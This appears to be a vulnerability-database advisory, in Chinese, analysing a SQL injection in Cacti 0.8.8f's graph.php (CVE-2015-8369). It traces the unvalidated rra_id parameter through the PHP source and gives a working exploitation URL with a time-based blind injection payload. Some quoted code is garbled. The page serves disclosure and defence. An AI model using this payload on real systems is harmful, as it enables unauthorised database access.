Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:90193
HistoryDec 30, 2015 - 12:00 a.m.

Cacti SQL注入漏洞(CNVD-2015-08486)

2015-12-3000:00:00
Root
www.seebug.org
123

0.014 Low

EPSS

Percentile

84.9%

JSON

0x01 漏洞简述

Cacti是Cacti集团的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。

Cacti 0.8.8f以前版本存在SQL注入漏洞。允许远程攻击者通过graphphp属性行动中的rra_id参数执行任意SQL命令。

0x02 漏洞细节

漏洞存在于文件
/cacti-0.8.8f/graph.php

line 25

include_once("./include/top_graph_header.php");
/* set default action */
if (!isset(["action"])) { ["action"] = "view"; }
if (!isset(["view_type"])) { ["view_type"] = ""; }

 = true;
include("./include/auth.php");
include_once("./lib/rrd.php");

api_plugin_hook_function('graph');

include_once("./lib/html_tree.php");
include_once("./include/top_graph_header.php");

/* ================= input validation ================= */
input_validate_input_regex(get_request_var("rra_id"), "^([0-9]+|all)$");
input_validate_input_number(get_request_var("local_graph_id"));
input_validate_input_number(get_request_var("graph_end"));
input_validate_input_number(get_request_var("graph_start"));
input_validate_input_regex(get_request_var_request("view_type"), "^([a-zA-Z0-9]+)$");
/* ==================================================== */

/cacti-0.8.8f/include/top_graph_header.php

line 30 rra_id 参数未验证

/* ================= input validation ================= */
input_validate_input_number(get_request_var_request("local_graph_id"));
input_validate_input_number(get_request_var_request("graph_start"));
input_validate_input_number(get_request_var_request("graph_end"));
/* ==================================================== */

继续跟踪

line 158
<?php if ((basename($_SERVER[“PHP_SELF”]) == “graph.php”) && ($_REQUEST[“action”] == “properties”)) {?>
<tr>
<td valign=“top” colspan=“3”>
<?php
$graph_data_array[“print_source”] = true;

        /* override: graph start time (unix time) */
        if (!empty($_GET["graph_start"])) {
            $graph_data_array["graph_start"] = get_request_var_request("graph_start");
        }

        /* override: graph end time (unix time) */
        if (!empty($_GET["graph_end"])) {
            $graph_data_array["graph_end"] = get_request_var_request("graph_end");
        }

        print trim(@rrdtool_function_graph(get_request_var_request("local_graph_id"), get_request_var_request("rra_id"), $graph_data_array));
        ?&gt;

\cacti-0.8.8f\lib\rrd.php function rrdtool_function_graph line 631
$rra[“timespan”] = 86400;
}else{
/* get a list of RRAs related to this graph */
$rras = get_associated_rras($local_graph_id);

        if (sizeof($rras) &gt; 0) {
            foreach ($rras as $unchosen_rra) {
                /* the timespan specified in the RRA "timespan" field may not be accurate */
                $real_timespan = ($ds_step * $unchosen_rra["steps"] * $unchosen_rra["rows"]);

                /* make sure the current start/end times fit within each RRA's timespan */
                if ( (($graph_data_array["graph_end"] - $graph_data_array["graph_start"]) &lt;= $real_timespan) && ((time() - $graph_data_array["graph_start"]) &lt;= $real_timespan) ) {
                    /* is this RRA better than the already chosen one? */
                    if ((isset($rra)) && ($unchosen_rra["steps"] &lt; $rra["steps"])) {
                        $rra = $unchosen_rra;
                    }else if (!isset($rra)) {
                        $rra = $unchosen_rra;
                    }
                }
            }
        }

        if (!isset($rra)) {
            $rra["rows"] = 600;
            $rra["steps"] = 1;
        }
    }
}else{
// sql injection here 
    $rra = db_fetch_row("select timespan,rows,steps from rra where id=$rra_id");
}

利用方式:

http://192.168.x.x/cacti/graph.php?action=properties&local_graph_id=1&rra_id=1%20and%20benchmark(20000000%2csha1(1))--%20&view_type=&graph_start=1448274676&graph_end=1448360776

0x03 参考链接

FULLDISC:20151209 [CVE-2015-8369] Cacti SQL injection in graph.php

URL:http://seclists.org/fulldisclosure/2015/Dec/8

MISC:http://bugs.cacti.net/view.php?id=2646

Related

debiancve 1
debian 5
zdt 1
cve 1
nessus 7
packetstorm 1
openvas 6
freebsd 1
prion 1
ubuntucve 1
osv 1
archlinux 1
mageia 1
gentoo 1
debiancve
debiancve
CVE-2015-8369
2015-12-17 19:59:00
debian
debian
[SECURITY] [DLA 374-2] cacti regression update
2015-12-30 22:24:17
[SECURITY] [DSA 3423-1] cacti security update
2015-12-16 20:09:42
[SECURITY] [DSA 3423-1] cacti security update
2015-12-16 20:09:42
zdt
zdt
Cacti 0.8.8f SQL Injection Vulnerability
2015-12-10 00:00:00
cve
cve
CVE-2015-8369
2015-12-17 19:59:00
nessus
nessus
Debian DLA-374-3 : cacti regression update
2015-12-29 00:00:00
Debian DSA-3423-1 : cacti - security update
2015-12-17 00:00:00
FreeBSD : cacti -- SQL injection vulnerabilities (bb961ff3-b3a4-11e5-8255-5453ed2e2b49)
2016-01-06 00:00:00
packetstorm
packetstorm
Cacti 0.8.8f SQL Injection
2015-12-09 00:00:00
openvas
openvas
Debian: Security Advisory (DSA-3423-1)
2015-12-15 00:00:00
Debian Security Advisory DSA 3423-1 (cacti - security update)
2015-12-16 00:00:00
Debian: Security Advisory (DLA-374)
2023-03-08 00:00:00
freebsd
freebsd
cacti -- SQL injection vulnerabilities
2015-12-05 00:00:00
prion
prion
Sql injection
2015-12-17 19:59:00
ubuntucve
ubuntucve
CVE-2015-8369
2015-12-17 00:00:00
osv
osv
cacti - security update
2015-12-26 00:00:00
archlinux
archlinux
cacti: sql injection
2016-02-28 00:00:00
mageia
mageia
Updated cacti packages fix security vulnerability
2016-01-20 20:53:26
gentoo
gentoo
Cacti: Multiple vulnerabilities
2016-07-16 00:00:00

0.014 Low

EPSS

Percentile

84.9%

JSON
Related for SSV:90193
debiancve1debian5zdt1cve1nessus7packetstorm1openvas6freebsd1prion1ubuntucve1osv1archlinux1mageia1gentoo1